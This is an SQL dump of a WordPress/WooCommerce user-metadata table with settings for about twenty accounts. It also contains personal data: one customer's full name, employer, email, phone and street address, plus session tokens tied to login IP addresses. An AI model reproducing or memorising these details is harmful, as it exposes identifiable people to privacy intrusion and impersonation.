INSERT INTO `wp_usermeta` VALUES (14001, 908, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14002, 908, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14003, 908, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14004, 908, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14005, 908, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14006, 908, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14007, 908, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14008, 908, '_yoast_wpseo_profile_updated', '1494064860'); 
INSERT INTO `wp_usermeta` VALUES (14009, 908, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14010, 374, 'session_tokens', 'a:1:{s:64:"eabd507f1f98be50a5cd7ab0ef379c75496ed43cca7df0413f9b93b509dd87e7";a:4:{s:10:"expiration";i:1501757905;s:2:"ip";s:12:"27.251.53.59";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501585105;}}'); 
INSERT INTO `wp_usermeta` VALUES (14011, 374, 'last_update', '1495629137'); 
INSERT INTO `wp_usermeta` VALUES (14012, 909, 'nickname', 'Barry.Walker'); 
INSERT INTO `wp_usermeta` VALUES (14013, 909, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14014, 909, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14015, 909, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14016, 909, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14017, 909, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14018, 909, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14019, 909, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14020, 909, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14021, 909, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14022, 909, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14023, 909, '_yoast_wpseo_profile_updated', '1494088776'); 
INSERT INTO `wp_usermeta` VALUES (14024, 909, 'session_tokens', 'a:1:{s:64:"959935cfd9de84f347a2413c72f1206581fc3f345db13febf6a4d6cca9dadbf2";a:4:{s:10:"expiration";i:1495298386;s:2:"ip";s:14:"134.132.30.221";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494088786;}}'); 
INSERT INTO `wp_usermeta` VALUES (14025, 909, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (14026, 910, 'nickname', 'tiara.tian2005'); 
INSERT INTO `wp_usermeta` VALUES (14027, 910, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14028, 910, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14029, 910, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14030, 910, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14031, 910, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14032, 910, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14033, 910, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14034, 910, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14035, 910, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14036, 910, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14037, 910, '_yoast_wpseo_profile_updated', '1494154663'); 
INSERT INTO `wp_usermeta` VALUES (14038, 910, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14039, 911, 'nickname', 'ninucella1960'); 
INSERT INTO `wp_usermeta` VALUES (14040, 911, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14041, 911, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14042, 911, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14043, 911, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14044, 911, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14045, 911, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14046, 911, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14047, 911, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14048, 911, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14049, 911, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14050, 911, '_yoast_wpseo_profile_updated', '1494172831'); 
INSERT INTO `wp_usermeta` VALUES (14051, 911, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14052, 912, 'nickname', 'creighton.lee1989'); 
INSERT INTO `wp_usermeta` VALUES (14053, 912, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14054, 912, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14055, 912, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14056, 912, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14057, 912, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14058, 912, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14059, 912, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14060, 912, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14061, 912, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14062, 912, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14063, 912, '_yoast_wpseo_profile_updated', '1494179454'); 
INSERT INTO `wp_usermeta` VALUES (14064, 912, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14065, 913, 'nickname', 'mrmrsbauer2010'); 
INSERT INTO `wp_usermeta` VALUES (14066, 913, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14067, 913, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14068, 913, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14069, 913, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14070, 913, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14071, 913, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14072, 913, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14073, 913, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14074, 913, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14075, 913, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14076, 913, '_yoast_wpseo_profile_updated', '1494225033'); 
INSERT INTO `wp_usermeta` VALUES (14077, 913, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14078, 914, 'nickname', 'doyle.anderson'); 
INSERT INTO `wp_usermeta` VALUES (14079, 914, 'first_name', 'Doyle'); 
INSERT INTO `wp_usermeta` VALUES (14080, 914, 'last_name', 'Anderson'); 
INSERT INTO `wp_usermeta` VALUES (14081, 914, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14082, 914, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14083, 914, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14084, 914, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14085, 914, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14086, 914, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14087, 914, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14088, 914, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14089, 914, '_yoast_wpseo_profile_updated', '1494245784'); 
INSERT INTO `wp_usermeta` VALUES (14090, 914, 'session_tokens', 'a:1:{s:64:"45037166bdb1d2c864262aa5a4772c6877186969dbbb5b931edc356896dd88ac";a:4:{s:10:"expiration";i:1495455393;s:2:"ip";s:11:"72.25.0.163";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494245793;}}'); 
INSERT INTO `wp_usermeta` VALUES (14091, 914, 'billing_first_name', 'Doyle'); 
INSERT INTO `wp_usermeta` VALUES (14092, 914, 'billing_last_name', 'Anderson'); 
INSERT INTO `wp_usermeta` VALUES (14093, 914, 'billing_company', 'Amphenol ICC'); 
INSERT INTO `wp_usermeta` VALUES (14094, 914, 'billing_email', 'doyle.anderson@fci.com'); 
INSERT INTO `wp_usermeta` VALUES (14095, 914, 'billing_phone', '7179387663'); 
INSERT INTO `wp_usermeta` VALUES (14096, 914, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (14097, 914, 'billing_address_1', '825 Old Trail Road'); 
INSERT INTO `wp_usermeta` VALUES (14098, 914, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (14099, 914, 'billing_city', 'Etters'); 
INSERT INTO `wp_usermeta` VALUES (14100, 914, 'billing_state', 'PA'); 
INSERT INTO `wp_usermeta` VALUES (14101, 914, 'billing_postcode', '17319'); 
INSERT INTO `wp_usermeta` VALUES (14102, 914, 'last_update', '1494245906'); 
INSERT INTO `wp_usermeta` VALUES (14103, 915, 'nickname', 'labaronmassey1990'); 
INSERT INTO `wp_usermeta` VALUES (14104, 915, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14105, 915, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14106, 915, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14107, 915, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14108, 915, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14109, 915, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14110, 915, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14111, 915, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14112, 915, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14113, 915, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14114, 915, '_yoast_wpseo_profile_updated', '1494249203'); 
INSERT INTO `wp_usermeta` VALUES (14115, 915, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14116, 916, 'nickname', 'erhealthy_products1987'); 
INSERT INTO `wp_usermeta` VALUES (14117, 916, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14118, 916, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14119, 916, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14120, 916, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14121, 916, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14122, 916, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14123, 916, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14124, 916, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14125, 916, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14126, 916, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14127, 916, '_yoast_wpseo_profile_updated', '1494264202'); 
INSERT INTO `wp_usermeta` VALUES (14128, 916, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14129, 917, 'nickname', 'mpg9161975'); 
INSERT INTO `wp_usermeta` VALUES (14130, 917, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14131, 917, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14132, 917, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14133, 917, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14134, 917, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14135, 917, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14136, 917, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14137, 917, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14138, 917, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14139, 917, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14140, 917, '_yoast_wpseo_profile_updated', '1494264448'); 
INSERT INTO `wp_usermeta` VALUES (14141, 917, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14142, 918, 'nickname', 'christopher.whitlaw'); 
INSERT INTO `wp_usermeta` VALUES (14143, 918, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14144, 918, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14145, 918, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14146, 918, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14147, 918, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14148, 918, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14149, 918, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14150, 918, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14151, 918, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14152, 918, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14153, 918, '_yoast_wpseo_profile_updated', '1494266518'); 
INSERT INTO `wp_usermeta` VALUES (14154, 918, 'session_tokens', 'a:1:{s:64:"d992705eddd65528b4c1f87ceacb03030acefd799c41ad5b4f5be562434ed093";a:4:{s:10:"expiration";i:1495476126;s:2:"ip";s:12:"192.206.89.4";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1494266526;}}'); 
INSERT INTO `wp_usermeta` VALUES (14155, 919, 'nickname', 'christopher.whitlaw1'); 
INSERT INTO `wp_usermeta` VALUES (14156, 919, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14157, 919, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14158, 919, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14159, 919, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14160, 919, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14161, 919, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14162, 919, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14163, 919, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14164, 919, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14165, 919, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14166, 919, '_yoast_wpseo_profile_updated', '1494266608'); 
INSERT INTO `wp_usermeta` VALUES (14167, 919, 'session_tokens', 'a:1:{s:64:"d53a07063e2fd9c26884af0489a7b56561fd707f279f48feb2d8be488bb88bab";a:4:{s:10:"expiration";i:1495476218;s:2:"ip";s:12:"192.206.89.4";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1494266618;}}'); 
INSERT INTO `wp_usermeta` VALUES (14168, 920, 'nickname', 'jlederluis1961'); 
INSERT INTO `wp_usermeta` VALUES (14169, 920, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14170, 920, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14171, 920, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14172, 920, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14173, 920, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14174, 920, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14175, 920, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14176, 920, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14177, 920, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14178, 920, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14179, 920, '_yoast_wpseo_profile_updated', '1494267243'); 
INSERT INTO `wp_usermeta` VALUES (14180, 920, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14181, 921, 'nickname', 'lsparks'); 
INSERT INTO `wp_usermeta` VALUES (14182, 921, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14183, 921, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14184, 921, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14185, 921, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14186, 921, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14187, 921, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14188, 921, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14189, 921, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14190, 921, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14191, 921, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14192, 921, '_yoast_wpseo_profile_updated', '1494268253'); 
INSERT INTO `wp_usermeta` VALUES (14193, 921, 'session_tokens', 'a:1:{s:64:"f05141de43876fd714be825dae3133c638e2e8ffbe44489d9de11603f9cac3b4";a:4:{s:10:"expiration";i:1495477861;s:2:"ip";s:12:"153.2.247.33";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494268261;}}'); 
INSERT INTO `wp_usermeta` VALUES (14194, 922, 'nickname', 'mclark'); 
INSERT INTO `wp_usermeta` VALUES (14195, 922, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14196, 922, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14197, 922, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14198, 922, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14199, 922, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14200, 922, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14201, 922, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14202, 922, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14203, 922, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14204, 922, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14205, 922, '_yoast_wpseo_profile_updated', '1494272668'); 
INSERT INTO `wp_usermeta` VALUES (14206, 922, 'session_tokens', 'a:1:{s:64:"793e4d2a71c1ed7f8a9f85e97dccef6f55016de0a453e7b3b4f39af5221f536f";a:4:{s:10:"expiration";i:1495482277;s:2:"ip";s:13:"75.76.167.128";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494272677;}}'); 
INSERT INTO `wp_usermeta` VALUES (14207, 923, 'nickname', 'jordan.julius'); 
INSERT INTO `wp_usermeta` VALUES (14208, 923, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14209, 923, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14210, 923, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14211, 923, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14212, 923, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14213, 923, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14214, 923, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14215, 923, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14216, 923, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14217, 923, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14218, 923, '_yoast_wpseo_profile_updated', '1494274700'); 
INSERT INTO `wp_usermeta` VALUES (14219, 923, 'session_tokens', 'a:2:{s:64:"2248c3dc3c76064c3f544aea19099145d7a36a40e24172e9c51de489fd85441a";a:4:{s:10:"expiration";i:1495484308;s:2:"ip";s:15:"198.169.189.232";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494274708;}s:64:"fb3b334b061b97519d41a32d6aced1bc29b75d14b9e290c1ce4d66e71f80e521";a:4:{s:10:"expiration";i:1494447549;s:2:"ip";s:15:"198.169.189.232";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494274749;}}'); 
INSERT INTO `wp_usermeta` VALUES (14220, 924, 'nickname', 'laurie.milne1979'); 
INSERT INTO `wp_usermeta` VALUES (14221, 924, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14222, 924, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14223, 924, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14224, 924, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14225, 924, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14226, 924, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14227, 924, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14228, 924, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14229, 924, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14230, 924, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14231, 924, '_yoast_wpseo_profile_updated', '1494280909'); 
INSERT INTO `wp_usermeta` VALUES (14232, 924, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14233, 925, 'nickname', 'buttons131987'); 
INSERT INTO `wp_usermeta` VALUES (14234, 925, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14235, 925, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14236, 925, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14237, 925, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14238, 925, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14239, 925, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14240, 925, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14241, 925, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14242, 925, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14243, 925, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14244, 925, '_yoast_wpseo_profile_updated', '1494282750'); 
INSERT INTO `wp_usermeta` VALUES (14245, 925, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14246, 926, 'nickname', 'recordrepeat1959'); 
INSERT INTO `wp_usermeta` VALUES (14247, 926, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14248, 926, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14249, 926, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14250, 926, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14251, 926, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14252, 926, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14253, 926, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14254, 926, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14255, 926, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14256, 926, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14257, 926, '_yoast_wpseo_profile_updated', '1494299183'); 
INSERT INTO `wp_usermeta` VALUES (14258, 926, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14259, 927, 'nickname', 'gans422008'); 
INSERT INTO `wp_usermeta` VALUES (14260, 927, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14261, 927, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14262, 927, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14263, 927, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14264, 927, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14265, 927, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14266, 927, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14267, 927, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14268, 927, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14269, 927, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14270, 927, '_yoast_wpseo_profile_updated', '1494325739'); 
INSERT INTO `wp_usermeta` VALUES (14271, 927, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (14272, 928, 'nickname', 'derrick.j.brown2'); 
INSERT INTO `wp_usermeta` VALUES (14273, 928, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14274, 928, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14275, 928, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14276, 928, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14277, 928, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14278, 928, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14279, 928, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14280, 928, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14281, 928, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14282, 928, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14283, 928, '_yoast_wpseo_profile_updated', '1494326958'); 
INSERT INTO `wp_usermeta` VALUES (14285, 374, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (14286, 929, 'nickname', 'wayne.bilodeau'); 
INSERT INTO `wp_usermeta` VALUES (14287, 929, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14288, 929, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (14289, 929, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (14290, 929, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14291, 929, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (14292, 929, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (14293, 929, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (14294, 929, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (14295, 929, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (14296, 929, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (14297, 929, '_yoast_wpseo_profile_updated', '1494334204'); 
